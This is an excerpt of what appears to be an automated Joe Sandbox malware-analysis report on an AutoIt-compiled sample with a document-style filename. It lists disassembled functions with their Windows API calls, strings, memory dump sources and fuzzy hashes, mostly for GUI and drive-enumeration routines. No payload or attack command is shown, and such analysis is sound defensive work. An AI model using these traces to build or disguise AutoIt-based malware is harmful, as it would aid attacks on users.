                                                        • CreateSolidBrush.GDI32(00000000), ref: 0077D18B
                                                        • FrameRect.USER32(?,?,00000000), ref: 0077D19A
                                                        • DeleteObject.GDI32(00000000), ref: 0077D1A1
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0077D1EC
                                                        • FillRect.USER32(?,?,00000000), ref: 0077D21E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077D249
                                                          • Part of subcall function 0077D385: GetSysColor.USER32(00000012), ref: 0077D3BE
                                                          • Part of subcall function 0077D385: SetTextColor.GDI32(?,?), ref: 0077D3C2
                                                          • Part of subcall function 0077D385: GetSysColorBrush.USER32(0000000F), ref: 0077D3D8
                                                          • Part of subcall function 0077D385: GetSysColor.USER32(0000000F), ref: 0077D3E3
                                                          • Part of subcall function 0077D385: GetSysColor.USER32(00000011), ref: 0077D400
                                                          • Part of subcall function 0077D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0077D40E
                                                          • Part of subcall function 0077D385: SelectObject.GDI32(?,00000000), ref: 0077D41F
                                                          • Part of subcall function 0077D385: SetBkColor.GDI32(?,00000000), ref: 0077D428
                                                          • Part of subcall function 0077D385: SelectObject.GDI32(?,?), ref: 0077D435
                                                          • Part of subcall function 0077D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0077D454
                                                          • Part of subcall function 0077D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0077D46B
                                                          • Part of subcall function 0077D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0077D480
                                                          • Part of subcall function 0077D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0077D4A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: c40ee3708e0155d35517c449aaabdad12f9f8e0932ad5348ba6bec3f1de6cc50
                                                        • Instruction ID: 0cdab2ee3025fc6aa37c7e0ec78ce9f137303dfbedde383cceeffea52e65cc1b
                                                        • Opcode Fuzzy Hash: c40ee3708e0155d35517c449aaabdad12f9f8e0932ad5348ba6bec3f1de6cc50
                                                        • Instruction Fuzzy Hash: A591B172008305AFCB209F64DC08E6BBBB9FF85360F118A1AF566961E0D779DD42CB55
                                                        Function 0076A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 0076A42A
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0076A4E9
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0076A527
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0076A539
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0076A57F
                                                        • GetClientRect.USER32(00000000,?), ref: 0076A58B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0076A5CF
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0076A5DE
                                                        • GetStockObject.GDI32(00000011), ref: 0076A5EE
                                                        • SelectObject.GDI32(00000000,00000000), ref: 0076A5F2
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0076A602
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0076A60B
                                                        • DeleteDC.GDI32(00000000), ref: 0076A614
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0076A642
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0076A659
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0076A694
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0076A6A8
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0076A6B9
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0076A6E9
                                                        • GetStockObject.GDI32(00000011), ref: 0076A6F4
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0076A6FF
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0076A709
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 4c803bb49ff08e723490bb34a2eab3f45b0422bb78963a02217e1d4cefe2ce2e
                                                        • Instruction ID: 2d788bd6005e958233367a69d021a1ec27460b5e998b7626c443ff98fa65cdc1
                                                        • Opcode Fuzzy Hash: 4c803bb49ff08e723490bb34a2eab3f45b0422bb78963a02217e1d4cefe2ce2e
                                                        • Instruction Fuzzy Hash: 1EA19F71A40205BFEB14DBA8DC4AFAE7BB9EB04710F008115FA15A72E1DB78AD41CF64
                                                        Function 0075E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075E45E
                                                        • GetDriveTypeW.KERNEL32(?,007ADC88,?,\\.\,007ADBF0), ref: 0075E54B
                                                        • SetErrorMode.KERNEL32(00000000,007ADC88,?,\\.\,007ADBF0), ref: 0075E6B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 7e25729e7efe3786e4b2707bf2b627cf0dc76641d057abe2c973eb8946e47b3c
                                                        • Instruction ID: d3ce311815b57c8210fff2f12bb45e28c663560413cc08edf1a0027d70c2fa5e
                                                        • Opcode Fuzzy Hash: 7e25729e7efe3786e4b2707bf2b627cf0dc76641d057abe2c973eb8946e47b3c
                                                        • Instruction Fuzzy Hash: 5851E470248301EBC318DF18C895DEDB7D1EB94786B10C91DF846AB1D1DAACDF49D652
                                                        Function 0071C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: 6864c29d66d40736058140b9dd4e7f0cf5aff5c2887b3004f1a65d6a0f54f9a6
                                                        • Instruction ID: 92838d5132e4ac5600b29339343f5bae81fcbd6b614ae3f0fdd08f9d97d523cd
                                                        • Opcode Fuzzy Hash: 6864c29d66d40736058140b9dd4e7f0cf5aff5c2887b3004f1a65d6a0f54f9a6
                                                        • Instruction Fuzzy Hash: 76610C71280251BBE732BAAC9C86FFA3358AF16740F140025F956A61C3EB9CDE91C661
                                                        Function 007148C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32 ref: 00714956
                                                        • DeleteObject.GDI32(00000000), ref: 00714998
                                                        • DeleteObject.GDI32(00000000), ref: 007149A3
                                                        • DestroyCursor.USER32(00000000), ref: 007149AE
                                                        • DestroyWindow.USER32(00000000), ref: 007149B9
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0078E179
                                                        • 6F570200.COMCTL32(?,000000FF,?), ref: 0078E1B2
                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0078E5E0
                                                          • Part of subcall function 007149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00714954,00000000), ref: 00714A23
                                                        • SendMessageW.USER32 ref: 0078E627
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0078E63E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF570200InvalidateMoveRect
                                                        • String ID: 0
                                                        • API String ID: 2008601239-4108050209
                                                        • Opcode ID: 8e72f83cd81b867c88f10a6c81e0998c83af7dbedc957feaa0d58f54bd4133d4
                                                        • Instruction ID: 5745613bea5bbe8ec58a548eace3107edea0b0b8901dc62eacbf8321e530b766
                                                        • Opcode Fuzzy Hash: 8e72f83cd81b867c88f10a6c81e0998c83af7dbedc957feaa0d58f54bd4133d4
                                                        • Instruction Fuzzy Hash: B912A130640642DFDB20DF18C888BAAB7F5BF45304F14456AF599CB292C739EC96CB91
                                                        Function 00776189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,007ADBF0), ref: 00776245
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 3964851224-45149045
                                                        • Opcode ID: 140dfbc06a9b986194dbf64b59281755df3b09ba39069c3134d4ff21266e46d9
                                                        • Instruction ID: 850e956cc83853528bbfa2d8838bab0de8b25bd3e5012a008a202ca9b2a2ef3a
                                                        • Opcode Fuzzy Hash: 140dfbc06a9b986194dbf64b59281755df3b09ba39069c3134d4ff21266e46d9
                                                        • Instruction Fuzzy Hash: 4FC17534204611DBCF04EF14C455AADB7E6AF95394F04887DF88A5B39ADB2CDD4ACB82
                                                        Function 0077D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0077D3BE
                                                        • SetTextColor.GDI32(?,?), ref: 0077D3C2
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0077D3D8
                                                        • GetSysColor.USER32(0000000F), ref: 0077D3E3
                                                        • CreateSolidBrush.GDI32(?), ref: 0077D3E8
                                                        • GetSysColor.USER32(00000011), ref: 0077D400
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0077D40E
                                                        • SelectObject.GDI32(?,00000000), ref: 0077D41F
                                                        • SetBkColor.GDI32(?,00000000), ref: 0077D428
                                                        • SelectObject.GDI32(?,?), ref: 0077D435
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0077D454
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0077D46B
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0077D480
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0077D4A8
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0077D4CF
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0077D4ED
                                                        • DrawFocusRect.USER32(?,?), ref: 0077D4F8
                                                        • GetSysColor.USER32(00000011), ref: 0077D506
                                                        • SetTextColor.GDI32(?,00000000), ref: 0077D50E
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0077D522
                                                        • SelectObject.GDI32(?,0077D0B5), ref: 0077D539
                                                        • DeleteObject.GDI32(?), ref: 0077D544
                                                        • SelectObject.GDI32(?,?), ref: 0077D54A
                                                        • DeleteObject.GDI32(?), ref: 0077D54F
                                                        • SetTextColor.GDI32(?,?), ref: 0077D555
                                                        • SetBkColor.GDI32(?,?), ref: 0077D55F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 8aa1bd458ed9e9669356b20ed625cd9593844638701ede0806067abb2ad46668
                                                        • Instruction ID: abb9f3e5b58aad7bb4be0d97caf173339d08e1e8102b9fcf518a6ea2430a1d88
                                                        • Opcode Fuzzy Hash: 8aa1bd458ed9e9669356b20ed625cd9593844638701ede0806067abb2ad46668
                                                        • Instruction Fuzzy Hash: 6C513D72900208EFDF209FA4DC48EAEBB79FF08360F218516F915AB2A1D7799D41CB54
                                                        Function 0077B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0077B5C0
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0077B5D1
                                                        • CharNextW.USER32(0000014E), ref: 0077B600
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0077B641
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0077B657
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0077B668
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0077B685
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0077B6D7
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0077B6ED
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0077B71E
                                                        • _memset.LIBCMT ref: 0077B743
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0077B78C
                                                        • _memset.LIBCMT ref: 0077B7EB
                                                        • SendMessageW.USER32 ref: 0077B815
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0077B86D
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0077B91A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0077B93C
                                                        • GetMenuItemInfoW.USER32(?), ref: 0077B986
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0077B9B3
                                                        • DrawMenuBar.USER32(?), ref: 0077B9C2
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0077B9EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: 45a23d60667d13fca7fdb0175df704f32b40a2db9734268bf81df89e307b8bde
                                                        • Instruction ID: ea51c8bda2da745efe2a7420436fde88da9de7b6a462641ea3902775705cd7c7
                                                        • Opcode Fuzzy Hash: 45a23d60667d13fca7fdb0175df704f32b40a2db9734268bf81df89e307b8bde
                                                        • Instruction Fuzzy Hash: A1E16E71900218EBDF209FA4CC88FEE7BB8EF05790F50C156F919AA191DB789A51DF60
                                                        Function 0077744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00777587
                                                        • GetDesktopWindow.USER32 ref: 0077759C
                                                        • GetWindowRect.USER32(00000000), ref: 007775A3
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00777605
                                                        • DestroyWindow.USER32(?), ref: 00777631
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0077765A
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00777678
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0077769E
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 007776B3
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007776C6
                                                        • IsWindowVisible.USER32(?), ref: 007776E6
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00777701
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00777715
                                                        • GetWindowRect.USER32(?,?), ref: 0077772D
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00777753
                                                        • GetMonitorInfoW.USER32 ref: 0077776D
                                                        • CopyRect.USER32(?,?), ref: 00777784
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 007777EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 513bacfce01cc79ebad0efaafe5b24ea8b1ab227b6501705147e3db35d617391
                                                        • Instruction ID: 7d9df38a99d0c35a3e711c87cdd957a8575f7f2012dd36e789e438cc790204ac
                                                        • Opcode Fuzzy Hash: 513bacfce01cc79ebad0efaafe5b24ea8b1ab227b6501705147e3db35d617391
                                                        • Instruction Fuzzy Hash: 3FB18E71608340AFDB18DF68C948B6ABBE4BF88350F00891DF59D9B291DB78EC05CB95
                                                        Function 0072A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0072A839
                                                        • GetSystemMetrics.USER32(00000007), ref: 0072A841
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0072A86C
                                                        • GetSystemMetrics.USER32(00000008), ref: 0072A874
                                                        • GetSystemMetrics.USER32(00000004), ref: 0072A899
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0072A8B6
                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0072A8C6
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0072A8F9
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0072A90D
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0072A92B
                                                        • GetStockObject.GDI32(00000011), ref: 0072A947
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0072A952
                                                          • Part of subcall function 0072B736: GetCursorPos.USER32(000000FF), ref: 0072B749
                                                          • Part of subcall function 0072B736: ScreenToClient.USER32(00000000,000000FF), ref: 0072B766
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000001), ref: 0072B78B
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000002), ref: 0072B799
                                                        • SetTimer.USER32(00000000,00000000,00000028,0072ACEE), ref: 0072A979
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
